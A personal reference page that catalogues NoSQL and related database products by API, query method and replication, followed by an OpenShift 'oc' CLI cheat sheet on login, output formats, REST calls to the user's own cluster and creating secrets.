  • written with JavaScript.
  • Includes Single Page Application API,
  • node serialization,
  • tree browsing and CRUD operations on document tuples through web GUI.
  • Integrate with server-side noSQL database instance into a transaction-synchronous cluster,
  • create SPA content or browse and serialize document tuples with HTML interface.

? SubRecord

? Mo8onDb

? Dovetaildb

Graph Databases

  • API: lots of langs,
  • Protocol: Java embedded / REST,
  • Query Method: SparQL, nativeJavaAPI, JRuby,
  • Replication: typical MySQL style master/slave,
  • Written in: Java,
  • Concurrency: non-block reads, writes locks involved nodes/relationships until commit,
  • Misc: ACID possible,
  • Links: Video », Blog »
  • API: Java,
  • Protocol: Direct Language Binding,
  • Query Method: Graph Navigation API, Predicate Language Qualification,
  • Written in: Java (Core C++), Data Model: Labeled Directed Multi Graph,
  • Concurrency: Update locking on subgraphs, concurrent non-blocking ingest,
  • Misc: Free for Qualified Startups.
  • API: Java, .NET, C++, Python, Objective-C, Blueprints Interface
  • Protocol: Embedded,
  • Query Method: as above + Gremlin (via Blueprints),
  • Written in: C++, Data Model: Labeled Directed Attributed Multigraph,
  • Concurrency: yes,
  • Misc: ACID possible, Free community edition up to 1 million objects,
  • Links: Intro », Technical Overview »
  • API: Java, Blueprints, Gremlin, Python, Clojure
  • Protocol: Thrift, RexPro(Binary), Rexster (HTTP/REST)
  • Query Method: Gremlin, SPARQL
  • Written In: Java Data Model: labeled Property Graph, directed, multi-graph adjacency list
  • Concurrency: ACID, Tunable Consistency
  • Replication: Multi-Master License: Apache 2 Pluggable backends: Cassandra, HBase, MapR M7 Tables, BDB, Persistit, Hazelcast
  • Links: Titan User Group
  • API: Java, http/REST,
  • Protocol: as API + XPRISO, OpenID, RSS, Atom, JSON, Java embedded,
  • Query Method: Web user interface with html, RSS, Atom, JSON output, Java native,
  • Replication: peer-to-peer,
  • Written in: Java,
  • Concurrency: concurrent reads, write lock within one MeshBase,
  • Misc: Presentation »
  • API: Java (and Java Langs),
  • Written in: Java,
  • Query Method: Java or P2P,
  • Replication: P2P,
  • Concurrency: STM,
  • Misc: Open-Source, Especially for AI and Semantic Web.

Sub-graph-based API, query language, tools & transactions.
Embedded Java, remote-proxy Java or REST.
Distributed storage & processing. Read/write all Nodes. Permissions & Constraints frameworks. Object storage, vertex-embedded agents. Supports multiple graph models.

  • Written in Java
  • API: C#,
  • Protocol: C# Language Binding,
  • Query Method: Graph Navigation API,
  • Replication: P2P with Master Node,
  • Written in: C#,
  • Concurrency: Yes (Transactional update in online query mode, Non-blocking read in Batch Mode)
  • Misc: distributed in-memory storage, parallel graph computation platform (Microsoft Research Project)
  • API: Java, Python, Ruby, C#, Perl, Clojure, Lisp
  • Protocol: REST,
  • Query Method: SPARQL and Prolog, Libraries: Social Networking Analytics & GeoSpatial,
  • Written in: Common Lisp,
  • Links: Learning Center », Videos »

A native, .NET, semantic web database with code first Entity Framework, LINQ and OData support.

  • API: C#,
  • Protocol: SPARQL HTTP, C#,
  • Query Method: LINQ, SPARQL,
  • Written in: C#
  • API: Java, Jini service discovery,
  • Concurrency: very high (MVCC),
  • Written in: Java,
  • Misc: GPL + commercial, Data: RDF data with inference, dynamic key-range sharding of indices,
  • Misc: Blog » (parallel database, high-availability architecture, immortal database with historical views)

RDF enterprise database management system. It is cross-platform and can be used with most programming languages. Main features: high performance, guarantee database transactions with ACID, secure with ACL's, SPARQL & SPARUL, ODBC & JDBC drivers, RDF & RDFS. »

WhiteDB is a fast lightweight graph/N-tuples shared memory database library

  • written in C with focus on speed, portability and ease of use. Both for Linux and Windows, dual licenced with GPLv3 and a free nonrestrictive royalty-free commercial licence.

Graph/ORM high throughput database built in Java supports embedded, in-memory, and remote. Horizontal scalability through sharding, partitioning,

  • replication, and disaster recovery
  • API: Java, REST via (Objective C, Android, etc...),
  • Protocol: Java embedded/Binary Socket/REST,
  • Query Method: Persistence Manager/ORM,
  • Replication: Multicast,
  • Written in: Java,
  • Concurrency: Re-entrant read/write,
  • Misc: Free and Open Source. Commercial licensing available

Hybrid DBMS covering the following models: Relational, Document, Graph

scalable, fast, consistent

Github

? OpenRDF / Sesame

? Filament

? OWLim

? NetworkX

? iGraph

? Jena

Multimodel Databases

  • API: REST, Graph Blueprints, C#, D, Ruby, Python, Java, PHP, Go, etc. Data Model: Documents, Graphs and Key/Values.
  • Protocol: HTTP using JSON.
  • Query Method: declarative query language (AQL), query by example.
  • Replication: master-slave (m-m to follow), Sharding: automatic and configurable
  • Written in: C/C++/Javascript (V8 integrated),
  • Concurrency: MVCC, tuneable
  • Misc: ACID transactions, microservices framework "Foxx" (Javascript), many secondary indices (fulltext, geo, hash, skip-list), capped collections
  • API: REST, Binary Protocol, Java, Node.js, Tinkerpop Blueprints, Python, PHP, Go, Elixir, etc., Schema: Has features of an Object-Database, DocumentDB, GraphDB and Key-Value DB,
  • Written in: Java,
  • Query Method: SQL, Gremlin, SparQL,
  • Concurrency: MVCC, tuneable, Indexing: Primary, Secondary, Composite indexes with support for Full-Text and Spatial,
  • Replication: Master-Master + sharding,
  • Misc: Really fast, Lightweight, ACID with recovery.

Bought by Apple Inc. Closed and reopened for public access.

  • API: Many jvm languages,
  • Protocol: Native + REST,
  • Query Method: Datalog + custom extensions, Scaling: elastic via underlying DB (in-mem, DynamoDB, Riak, CouchBase, Infinispan, more to come),
  • Written in: Clojure,
  • Concurrency: ACID
  • MISC: smart caching, unlimited read scalability, full-text search, cardinality, bi-directional refs for graph traversal, loves Clojure + Storm.
  • API: JavaScript Schema: Has features of an Object-Database, DocumentDB, GraphDB and Key-Value DB
  • Written in: JavaScript
  • Query Method: JavaScript
  • Concurrency: Eventual consistency with hybrid vector/timestamp/lexical conflict resolution Indexing: O(1) key/value, supports multiple indices per record
  • Replication: Multi-Master/Master; browser peer-to-peer (P2P) enabled
  • Misc: Open source, realtime sync, offline-first, distributed/decentralized, graph-oriented, and fault-tolerant

CortexDB is a dynamic schema-less multi-model database providing nearly all advantages of the currently known NoSQL database types (key-value store, document store, graph DB, multi-value DB, column DB) with dynamic re-organization during continuous operations, managing analytical and transaction data for agile software configuration, change requests on the fly, self service and low footprint.

Oracle NoSQL Database is a distributed key-value database with support for JSON docs. It is designed to provide highly reliable, scalable and available data storage across a configurable set of systems that function as storage nodes. Data is stored as key-value pairs, which are

  • written to particular storage node(s), based on the hashed value of the primary key. Storage nodes are replicated to ensure high availability, rapid failover in the event of a node failure and optimal load balancing of queries.
  • API: Java/C, Python, NodeJs, C#.

GraphDB + RDBMS + KV Store + Document Store. Alchemy Database is a low-latency high-TPS NewSQL RDBMS embedded in the NOSQL datastore redis. Extensive datastore-side-scripting is provided via deeply embedded Lua. Bought and integrated with Aerospike.

  • API:JDBC,SQL;
  • WonderDB is a fully transactional, distributed NewSQL database implemented in Java based on relational architectures. So you can get the best of both worlds: SQL, joins and ease of use from SQL, and distribution,
  • replication and sharding from the NoSQL movement. Tested performance is over 60K per node with an Amazon m3.xlarge VM.

A new concept to ‘NoSQL’ databases where a memory allocator and a transactional database are melted together into an almost seamless whole. The programming model uses variants of well-known memory allocation calls like ‘new’ and ‘delete’ to manage the database. The result is very fast, natural to use, reliable and scalable. It is especially good in Big Data, data collection, embedded, high performance, Internet of Things (IoT) or mobile type applications.

  • API: Languages/Protocol: Java, C#, C++, Python. Schema: language class model (easily changeable). Modes: always consistent and eventually consistent
  • Replication: synchronous fault tolerant and peer to peer asynchronous.
  • Concurrency: optimistic and object based locks. Scaling: can add physical nodes on fly for scale out/in and migrate objects between nodes without impact to application code.
  • Misc: MapReduce via parallel SQL like query across logical database groupings.
  • API: Java, C#, .Net Langs,
  • Protocol: language,
  • Query Method: QBE (by Example), Soda, Native Queries, LINQ (.NET),
  • Replication: db4o2db4o & dRS to relationals,
  • Written in: Java, Concurrency: ACID serialized,
  • Misc: embedded lib, Links: DZone Refcard #53 », Book »,
  • API: Languages: Java, C#, C++, Python, Smalltalk, SQL access through ODBC. Schema: native language class model, direct support for references, interoperable across all language bindings. 64 bit unique object ID (OID) supports multi exa-byte. Platforms: 32 and 64 bit Windows, Linux, Mac OSX, *Unix. Modes: always consistent (ACID).
  • Concurrency: locks at cluster of objects (container) level. Scaling: unique distributed architecture, dynamic addition/removal of clients & servers, cloud environment ready.
  • Replication: synchronous with quorum fault tolerant across peer to peer partitions.
  • API: Java, C, C++, Smalltalk Schema: language class model Platforms: Linux, AIX, Solaris, Mac OSX, Windows clients Modes: always consistent (ACID)
  • Replication: shared page cache per node, hot standby failover
  • Concurrency: optimistic and object based locks Scaling: arbitrarily large number of nodes
  • Misc: SQL via GemConnect
  • API: C# (.NET languages), Schema: Native language class model,
  • Query method: SQL,
  • Concurrency: Fully ACID compliant, Storage: In-memory with transactions secured on disk, Reliability: Full checkpoint recovery,
  • Misc: VMDBMS - Integrating the DBMS with the virtual machine for maximal performance and ease of use.
  • API: Java,Java ME,C#,Mono.
  • Query method: OO via Perst collections, QBE, Native Queries, LINQ, native full-text search, JSQL
  • Replication: Async+sync (master-slave)
  • Written in: Java, C#. Caching: Object cache (LRU, weak, strong), page pool, in-memory database
  • Concurrency: Pessimistic+optimistic (MVCC) + async or sync (ACID) Index types: Many tree models + Time Series.
  • Misc: Embedded lib., encryption, automatic recovery, native full text search, on-line or off-line backup.
  • Written in: 100% pure C#,
  • Concurrency: ACID/transactional, pessimistic/optimistic locking,
  • Misc: compact data, B-tree indexes, LINQ queries, 64bit object identifiers (Oid) supporting multi millions of databases and high performance. Deploy with a single DLL of around 400KB.
  • Written in: 100% C#, The HSS DB v3.0 (HighSpeed-Solutions Database), is a client based, zero-configuration, auto schema evolution, acid/transactional, LINQ Query, DBMS for Microsoft .NET 4/4.5, Windows 8 (Windows Runtime), Windows Phone 7.5/8, Silverlight 5, MonoTouch for iPhone and Mono for Android
  • API: Python,
  • Protocol: Internal, ZEO,
  • Query Method: Direct object access, zope.catalog, gocept.objectquery,
  • Replication: ZEO, ZEORAID, RelStorage
  • Written in: Python, C
  • Concurrency: MVCC, License: Zope Public License (OSI approved)
  • Misc: Used in production since 1998

Newt DB leverages the pluggable storage layer of ZODB to use RelStorage to store data in Postgres. Newt adds conversion of data from the native serialization used by ZODB to JSON, stored in a Postgres JSONB column. The JSON data supplements the native data to support indexing, search, and access from non-Python applications. It adds a search API for searching the Postgres JSON data and returning persistent objects.

  • Query Method: Postgres SQL, ZODB API,
  • Replication: Postgres, ZEO, ZEORAID, RelStorage,
  • Written in: Python,
  • Concurrency: MVCC, License: MIT
  • API: Python - ZODB "Storage" interface,
  • Protocol: native,
  • Query Method: transactional key-value,
  • Replication: native,
  • Written in: Python,
  • Concurrency: MVCC (internally), License: GPL "v2 or later",
  • Misc: Load balancing, fault tolerant, hot-extensible.

Smalltalk DB, optimistic locking, Transactions, etc.

An object database engine that currently runs on .NET, Mono, Silverlight, Windows Phone 7, MonoTouch, MonoAndroid, CompactFramework; It has implemented a Sync Framework Provider and can be synchronized with MS SQLServer;

  • Query method:LINQ;

Programming Language with an Object Database build in. Around since 1996.

is a lightweight object-oriented database for .NET with support for Silverlight and Windows Phone 7. It features in-memory keys and indexes, triggers, and support for compressing and encrypting the underlying data.

An embedded object database designed for mobile apps targeting .net and Mono runtimes. Supports .net/mono, Xamarin (iOS and Android), Windows 8.1/10, Windows Phone 8.1. Simple API, built on top of json.net and has a simple but effective indexing mechanism. Development is focused on being lightweight and developer friendly. Has transaction support. Open-source and free to use.

Stores .NET classes in a datapool. Build for speed. SQL Server integration. LINQ support.

EyeDB is an LGPL OODBMS, provides an advanced object model (inheritance, collections, arrays, methods, triggers, constraints, reflexivity), an object definition language based on ODMG ODL, an object query and manipulation language based on ODMG OQL. Programming interfaces for C++ and Java.

Object-Oriented Database designed to support the maintenance and sharing of knowledge bases. Optimized for pointer-intensive data structures used by semantic networks, frame systems, and many intelligent agent applications.

  • Written in: ANSI C.

Ninja Database Pro is a .NET ACID compliant relational object database that supports transactions, indexes, encryption, and compression. It currently runs on .NET Desktop Applications, Silverlight Applications, and Windows Phone 7 Applications.

  • API: C#, .Net, Mono, Windows Phone 7, Silverlight,
  • Protocol: language,
  • Query Method: Soda, LINQ (.NET),
  • Written in: C#,
  • Misc: embedded lib, indexes, triggers, handle circular ref, LinqPad support, Northwind sample, refactoring, in-memory database, Transactions Support (ACID)

Language and Object Database, can be viewed as a Database Development Framework. Schema: native language class model with relations + various indexes. Queries: language built-in + a small Prolog-like DSL, Pilog.

  • Concurrency: synchronization + locks.
  • Replication, distribution and fault tolerance are not implemented by default but can be implemented with native functionality.
  • Written in C (32bit) or assembly (64bit).
  • API: Haskell,
  • Query Method: Functional programming,
  • Written in: Haskell,
  • Concurrency: ACID, GHC concurrent runtime,
  • Misc: In-memory with disk-based log, supports remote access
  • Links: Wiki », Docs »
  • API: Java (JPA / JDO)
  • Query method: JPA JPQL, JDO JDOQL
  • Replication: Master-slave
  • Written in: 100% Pure Java Caching: Object cache, Data cache, Page cache, Query Result cache, Query program cache
  • Concurrency: Object level locking (pessimistic + optimistic) Index types: BTree, single, path, collection
  • Misc: Used in production since 2004, Embedded mode, Client Server mode, automatic recovery, on-line backup.

CoreObject: Version-controlled OODB, that supports powerful undo, semantic merging, and real-time collaborative editing. MIT-licensed,

  • API: ObjC, Schema: EMOF-like,
  • Concurrency: ACID,
  • Replication: differential sync,
  • Misc: DVCS based on object graph diffs, selective undo, refs across versioned docs, tagging, temporal indexing, integrity checking.

Grid & Cloud Database Solutions

In-Memory Computing Platform built on Apache® Ignite™ to provide high-speed transactions with ACID guarantees, real-time streaming, and fast analytics in a single, comprehensive data access and processing layer. The distributed in-memory key value store is ANSI SQL-99 compliant with support for SQL and DML via JDBC or ODBC.
API: Java, .NET, and C++. Minimal or no modifications to the application or database layers for architectures built on all popular RDBMS, NoSQL or Apache™ Hadoop® databases.

shared nothing, document-oriented cluster

  • data store. Accessed via SQL and has builtin BLOB support. Uses the cluster state implementation and node discovery of Elasticsearch. License: Apache 2.0,
  • Query Method: SQL, Clients: HTTP (REST), Python, Java (JDBC or native), Ruby, JS, Erlang,
  • Replication + Sharding: automatic and configurable,
  • written in: Java, » Crate Data GitHub Project, » Documentation.

Oracle Coherence offers distributed, replicated, multi-datacenter, tiered (off-heap/SSD) and near (client) caching. It provides distributed processing, querying, eventing, and map/reduce, session management, and propagation of database updates to caches. Operational support provided by a Grid Archive deployment model.

Popular SpaceBased Grid Solution.

GemFire offers in-memory globally distributed data management with dynamic scalability, very high performance and granular control supporting the most demanding applications. Well integrated with the Spring Framework, developers can quickly and easily provide sophisticated data management for applications. With simple horizontal scale-out, data latency caused by network roundtrips and disk I/O can be avoided even as applications grow.

scalable, highly available data grid platform, open source,

  • written in Java.

NOSQL Data Integration Environment, can integrate relational, object, BigData – NOSQL easily and without any SQL.

Hazelcast is an in-memory data grid that offers distributed data in Java with dynamic scalability under the Apache 2 open source license. It provides distributed data structures in Java in a single Jar file including hashmaps, queues, locks, topics and an execution service that allows you to simply program these data structures as pure java objects, while benefitting from symmetric multiprocessing and cross-cluster shared elastic memory of very high ingest data streams and very high transactional loads.

? Coherence

? eXtremeScale

XML Databases

  • API: Java, XQuery,
  • Protocol: WebDAV, web services,
  • Query method: XQuery, XPath, XPointer,
  • Replication: lazy primary copy
  • replication (master/replicas),
  • Written in: Java,
  • Concurrency: concurrent reads, writes with lock; transaction isolation,
  • Misc: Fully transactional persistent DOM; versioning; multiple index types; metadata and non-XML data support; unlimited horizontal scaling
  • API: XQuery, XML:DB API, DOM, SAX,
  • Protocols: HTTP/REST, WebDAV, SOAP, XML-RPC, Atom,
  • Query Method: XQuery,
  • Written in: Java (open source),
  • Concurrency: Concurrent reads, lock on write;
  • Misc: Entire web applications can be
  • written in XQuery, using XSLT, XHTML, CSS, and Javascript (for AJAX functionality). (1.4) adds a new full text search index based on Apache Lucene, a lightweight URL rewriting and MVC framework, and support for XProc.
  • Misc: ACID transactions, security, indices, hot backup. Flexible XML processing facilities include W3C XQuery implementation, tight integration of XQuery with full-text search facilities and a node-level update language.

BaseX is a fast, powerful, lightweight XML database system and XPath/XQuery processor with highly conformant support for the latest W3C Update and Full Text Recommendations. Client/Server architecture, ACID transaction support, user management, logging, Open Source, BSD-license,

  • written in Java, runs out of the box.

commercial and open source version,

  • API: Java,
  • Protocols: HTTP, REST,
  • Query Method: XQuery, XQuery Full-Text, XQuery Update,
  • Written in: Java, full source can be purchased,
  • Concurrency: Concurrent reads & writes, isolation,
  • Misc: Terabyte scalable, emphasizes query speed.
  • API: Many languages,
  • Written in: C++,
  • Query Method: XQuery,
  • Replication: Master / Slave,
  • Concurrency: MVCC, License: Sleepycat

API: Java. The application and database management system in one. Collects data as multiple XML files on the disk. Implements facet-oriented data model. Each data object is considered a universal facet container. The end-user can design and evolve data objects individually through the GUI without any coding by adding/removing facets to/from it.

Multidimensional Databases

by Intersystems, multidimensional array. Node.js API, array based APIs (Java / .NET), and a Java based document API.

Postrelational System. Multidimensional array APIs, Object APIs, Relational Support (Fully SQL capable JDBC, ODBC, etc.) and Document APIs are new in the upcoming 2012.2.x versions. Available for Windows, Linux and OpenVMS.

  • API: M, C, Python, Perl,
  • Protocol: native, inprocess C,
  • Misc: Wrappers: M/DB for SimpleDB compatible HTTP
  • »,
  • MDB:X for XML »,
  • PIP for mapping to tables for SQL »,
  • Features: Small footprint (17MB),
  • Terabyte Scalability,
  • Unicode support,
  • Database encryption, Secure,
  • ACID transactions (single node),
  • eventual consistency ( replication)
  • Links: Slides »,

Array Data Model for Scientists, » HiScaBlog

: Multidimensional arrays,

  • API: M, C, Pascal, Perl, .NET, ActiveX, Java, WEB. Available for Windows and Linux.

: Short description: Rasdaman is a scientific database that allows you to store and retrieve multi-dimensional raster data (arrays) of unlimited size through an SQL-style query language.

  • API: C++/Java,
  • Written in C++,
  • Query method: SQL-like query language rasql, as well as via OGC standards WCPS, WCS, WPS link2

is a new Realtime analytics database

  • written in .NET C#.
  • ACID compliant.
  • fluent .NET query API, Client / server or in-process.
  • In-memory and persistent mode.

Multivalue Databases

(UniVerse, UniData): MultiValue Databases, Data Structure: MultiValued, Supports nested entities, Virtual Metadata,

  • API: BASIC, InterCall, Socket, .NET and Java API's, IDE: Native, Record Oriented, Scalability: automatic table space allocation,
  • Protocol: Client Server, SOA, Terminal Line, X-OFF/X-ON,
  • Written in: C,
  • Query Method: Native mvQuery, (Retrieve/UniQuery) and SQL,
  • Replication: yes, Hot standby,
  • Concurrency: Record and File Locking (Fine and Coarse Granularity)
  • API: Basic+, .Net, COM, Socket, ODBC,
  • Protocol: TCP/IP, Named Pipes, Telnet, VT100. HTTP/S
  • Query Method: RList, SQL & XPath
  • Written in: Native 4GL, C, C++, Basic+, .Net, Java
  • Replication: Hot Standby
  • Concurrency: table &/or row locking, optionally transaction based & commit & rollback Data structure: Relational &/or MultiValue, supports nested entities Scalability: rows and tables size dynamically

D3, mvBase, mvEnterprise Data Structure: Dynamic multidimensional PICK data model, multi-valued, dictionary-driven,

  • API: NET, Java, PHP, C++,
  • Protocol: C/S,
  • Written In: C,
  • Query Method: AQL, SQL, ODBC, Pick/BASIC,
  • Replication: Hot Backup, FFR, Transaction Logging + real-time replication,
  • Concurrency: Row Level Locking, Connectivity: OSFI, ODBC, Web-Services, Web-enabled, Security: File level AES-128 encryption

(Reality NPS): The original MultiValue dataset database, virtual machine, enquiry and rapid development environment. Delivers ultra efficiency, scalability and resilience while extended for the web and with built-in auto sizing, failsafe and more. Interoperability includes Web Services - Java Classes, RESTful, XML, ActiveX, Sockets, .Net Languages, C and, for those who interoperate with the world of SQL, ODBC/JDBC with two-way transparent SQL data access.

Supports nested data. Fully automated table space allocation.

  • Concurrency control via task locks, file locks & shareable/exclusive record locks. Case insensitivity option. Secondary key indices. Integrated data
  • replication. QMBasic programming language for rapid development. OO programming integrated into QMBasic. QMClient connectivity from Visual Basic, PowerBasic, Delphi, PureBasic, ASP, PHP, C and more. Extended multivalue query language.

A high performance dbms that runs on IBM mainframes (IBM z/OS, z/VM, zVSE), +SQL interface with nested entity support

  • API: native 4GL (SOUL + o-o support), SQL, Host Language (COBOL, Assembler, PL1) API, ODBC, JDBC, .net, Websphere MQ, Sockets Scalability: automatic table space allocation, 64-bit support
  • Written in: IBM assembler, C
  • Query method: SOUL, SQL, RCL ( invocation of native language from client )
  • Concurrency: record and file level locking Connectivity: TN3270, Telnet, Http

Hybrid database / search engine system with characteristics of multi-value, document, relational, XML and graph databases. Used in production since 1985 for high-performance search and retrieve solutions. Full-text search, text classification, similarity search, results ranking, real time facets, Unicode, Chinese word segmentation, and more. Platforms: Windows, Linux, AIX and Solaris.

  • API: .NET, Java and C/C++.
  • Query methods: native (CCL), SQL subset, XPath. Commercial.

(by Microsoft) ISAM storage technology. Access using index or cursor navigation. Denormalized schemas, wide tables with sparse columns, multi-valued columns, and sparse and rich indexes. C# and Delphi drivers available. Backend for a number of MS Products as Exchange.

jBASE is an application platform and database that allows normal MultiValue (MV) applications to become native Windows, Unix or Linux programs. Traditional MV features are supported, including BASIC, Proc, Paragraph, Query and Dictionaries. jBASE jEDI Architecture, allows you to store data in any database, such as Microsoft SQL, Oracle and DB2. jBASE jAgent supports BASIC, C, C++, .NET, Java and REST APIs. Additional features include dynamic objects, encryption, case insensitivity, audit logging and transaction journaling for online backup and disaster recovery.

Event Sourcing

  • Clean,
  • succinct Command/Event model,
  • Compact data storage layout,
  • Disruptor for fast message processing,
  • CQengine for fast indexing and querying,
  • In-memory and on-disk storage,
  • Causality-preserving Hybrid Logical Clocks,
  • Locking synchronization primitive,
  • OSGi support

Time Series / Streaming Databases

Distributed DB designed to store and analyze high-frequency time-series data at scale. Includes a large set of built-in features: Rule Engine, Visualization, Data Forecasting, Data Mining.

  • API: RESTful API, Network API, Data API, Meta API, SQL API Clients: R, Java, Ruby, Python, PHP, Node.js
  • Replication: Master Slave Major protocol & format support: CSV, nmon, pickle, StatsD, collectd, tcollector, scollector, JMX, JDBC, SNMP, JSON, ICMP, OVPM, SOAP.

time-series database optimized for Big Data analytics.

very high-performance time series database. Highly scalable.

  • API: C, C++, Java, Python and (limited) RESTful
  • Protocol: binary
  • Query method: API/SQL-like,
  • Replication: Distributed,
  • Written in: C++ 11/Assembly,
  • Concurrency: ACID,
  • Misc: built-in data compression, native support for FreeBSD, Linux and Windows. License: Commercial.

Enterprise-grade NoSQL time series database optimized specifically for IoT and Time Series data. It ingests, transforms, stores, and analyzes massive amounts of time series data. Riak TS is engineered to be faster than Cassandra.

(listed also under other NoSQL related DBs)

Other NoSQL related databases

Type: Document Store,

  • API: Java, HTTP, IIOP, C API, REST Web Services, DXL, Languages: Java, JavaScript, LotusScript, C, @Formulas,
  • Protocol: HTTP, NRPC,
  • Replication: Master/Master,
  • Written in: C,
  • Concurrency: Eventually Consistent, Scaling:
  • Replication Clusters

Type: Hybrid In-Memory and/or Persistent Database Database;

  • Written in: C;
  • API: C/C++, SQL, JNI, C#(.NET), JDBC;
  • Replication: Async+sync (master-slave), Cluster; Scalability: 64-bit and MVCC

APIs: C++, Navigational C. Embedded Solution that is ACID Compliant with Multi-Core, On-Disk & In-Memory Support. Distributed Capabilities, Hot Online Backup, supports all Main Platforms. Supports B-Tree & Hash Indexing.

  • Replication: Master/Slave,
  • Concurrency: MVCC. Client/Server: In-process/Built-in.

NoSql, in-memory, flat-file, cloud-based. API interfaces. Small data footprint and very fast data retrieval. Stores 200 million records with 200 attributes in just 10GB. Retrieves 150 million records per second per CPU core. Often used to visualize big data on maps.

  • Written in C.

Next-gen NoSQL encrypted document store. Multi-recipient / group encryption. Features:

  • concurrency, indices, ACID transactions,
  • replication and PKI management. Supports PHP and many others.
  • Written in C++. Commercial but has a free version.
  • API: JSON

Service oriented, schema-less, network data model DBMS. Client application invokes methods of vyhodb services, which are

  • written in Java and deployed inside vyhodb. Vyhodb services read and modify storage data.
  • API: Java,
  • Protocol: RSI - Remote service invocation,
  • Written in: Java, ACID: fully supported,
  • Replication: async master slave,
  • Misc: online backup, License: proprietary

Applied Calculus implements persistent AVL Trees / AVL Databases. 14 different types of databases - represented as classes in both C# and Java. These databases perform transaction logging on the node file to ensure that failed transactions are backed out. Very fast on solid state storage (ca. 1780 transactions/second). AVL Trees considerably outperform B+ Trees on solid state. Very natural language interface. Each database is represented as a collection class that strongly resembles the corresponding class in Pure Calculus.

Java RAM Data structure journalling.

Python wrapper over sqlite3

A database as a service that can be queried with a spreadsheet through an HTTP API.

Scientific and Specialized DBs

BayesDB, a Bayesian database table, lets users query the probable implications of their tabular data as easily as an SQL database lets them query the data itself. Using the built-in Bayesian Query Language (BQL), users with no statistics training can solve basic data science problems, such as detecting predictive relationships between variables, inferring missing values, simulating probable observations, and identifying statistically similar database entries.

A distributed database for many core devices. GPUdb leverages many core devices such as NVIDIA GPUs to provide an unparalleled parallel database experience. GPUdb is a scalable, distributed database with SQL-style query capability, capable of storing Big Data. Developers using the GPUdb API add data, and query the data with operations like select, group by, and join. GPUdb includes many operations not available in other "cloud database" offerings.

unresolved and uncategorized

moved to Meteor

key/index/tuple DB. Using Pages.

  • Written in: Ruby. github: »

GNU Tool for text files containing records and fields. Manual »

Mainly targeted to Silverlight/Windows Phone developers but its also great for any .NET application where a simple local database is required, extremely Lightweight - less than 50K, stores one table per file, including index, compiled versions for Windows Phone 7, Silverlight and .NET, fast, free to use in your applications

A digital brain, based on the language of thought (Mentalese), to manage relations and strategies (with thoughts/words/symbols) into a cognitive cerebral structure.

  • Programing language: MQL (Mentalese Query Language) for mental processes,
  • ACID transaction,
  • API: REST and web socket, Thoughts Performance: READ: 18035/s; WRITE: 416/s; Asynchronous Full JAVA
  • written in Python

illuminate Correlation Database »,

FluidDB (Column Oriented DB) »,

nosql list

Theory

NoSql NoSql BoltDB

OpenShift cheat sheet

other cheat sheets

links collections

Init

install client

oc cli installation debian

sudo apt install oc

or download the appropriate release,
or retrieve "browser_download_url" from openshift downloads; example of a download link (from the previous link):

https://github.com/openshift/origin/releases/download/v3.11.0/openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit.tar.gz
tar -xvf openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit.tar.gz
mv openshift-origin-client-tools-v3.11.0-0cbc58b-linux-64bit /home/soft/openshift-tool
export PATH=/home/soft/openshift-tool:$PATH

check oc client version

oc version -v8 2>&1 | grep "User-Agent" | awk '{print $6}'
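
shorter alternative (a sketch, assuming a recent oc 4.x client where the --client flag is available):

# print only the client version
oc version --client
# or filter the default output
oc version | grep -i client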

odo cli
tkn cli

completion

source <(oc completion bash)
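
the same approach should work for zsh (a sketch, assuming the client provides zsh completion as well):

source <(oc completion zsh)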

trace logging communication, verbose output

rm -rf ~/.kube/cache
oc get pods -v=6
oc get pods -v=7
oc get pods -v=8
# 1..10
oc --loglevel 9 get pod

ocp output

oc get pods --no-headers
oc get pods -o json
oc get pods -o jsonpath={.metadata.name}
oc get dc -o jsonpath-as-json={.items[*].spec.template.spec.volumes[*].persistentVolumeClaim.claimName}

oc get pods -o yaml
oc get pods -o wide
oc get pods -o name

oc get pods -o custom-columns=NAME:.metadata.name,RSRC:.metadata.resourceVersion
# or data in file: template.txt
# NAME          RSRC
# metadata.name metadata.resourceVersion
oc get pods -o custom-columns-file=template.txt
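
another useful output format is a jsonpath range loop, e.g. to print one pod name per line (a small sketch using standard jsonpath syntax):

# one pod name per line
oc get pods -o jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}'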

REST api

print collaboration, output rest api call, print api calls

oc whoami -v=8

example of rest api collaboration, rest call

TOKEN=$(oc whoami -t)
ENDPOINT=$(oc status | head --lines=1 | awk '{print $6}')
NAMESPACE=$(oc status | head --lines=1 | awk '{print $3}')
echo $TOKEN
echo $ENDPOINT
echo $NAMESPACE

curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/pods
curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/namespaces/$NAMESPACE/pods
# watch on changes
curl -k -H "Authorization: Bearer $TOKEN" -H 'Accept: application/json' $ENDPOINT/api/v1/watch/namespaces/$NAMESPACE/pods

Login

login into openshift

oc login --username=admin --password=admin
echo "my_password" | oc login -u my_user
oc login -u developer -p developer
oc login {url}

check login

oc whoami
# or 
oc status | grep "on server"

using token after login multiterminal communication

# obtain user's token
OCP_TOKEN=`oc whoami -t`

# apply the token in another terminal/machine
oc login --token=$OCP_TOKEN

login into openshift using token

https://oauth-openshift.stg.zxxp.zur/oauth/token/display

 oc login --token=sha256~xxxxxxxxxxxxx --server=https://api.stg.zxxp.zur:6443

switch context, use another cluster

~/.kube/config

apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://localhost:6440
  name: docker-for-desktop-cluster   
- cluster:
    insecure-skip-tls-verify: true
    server: https://openshift-master-sim.myprovider.org:8443
  name: openshift-master-sim-myprovider-org:8443
kubectl config use-context kubernetes-admin@docker-for-desktop-cluster

check access to the namespace, to the resource

oc auth can-i update pods -n $NAME_OF_NAMESPACE
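
to list everything the current user is allowed to do in the namespace (a sketch, assuming the client supports the --list flag):

oc auth can-i --list -n $NAME_OF_NAMESPACE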

explain yaml schema

oc explain pods
oc explain pods --recursive
oc explain pods --recursive --api-version=autoscaling/v2beta1

get in yaml, get source of resource, describe yaml

oc get -o yaml  pod {name of the pod}
oc get -o json  pod {name of the pod}

# note: when --namespace is repeated, only the last one takes effect
oc get -o json  pod {name of the pod} --namespace one --namespace two --namespace three

secrets

create token for MapR

maprlogin password -user {mapruser}
# ticket-file will be created

check expiration date

maprlogin print -ticketfile /tmp/maprticket_1000 # or another filename

create secret from file

cat /tmp/maprticket_1000 
# create secret from file ( default name )
oc create secret generic {name of secret/token} --from-file=/tmp/maprticket_1000 -n {project name}
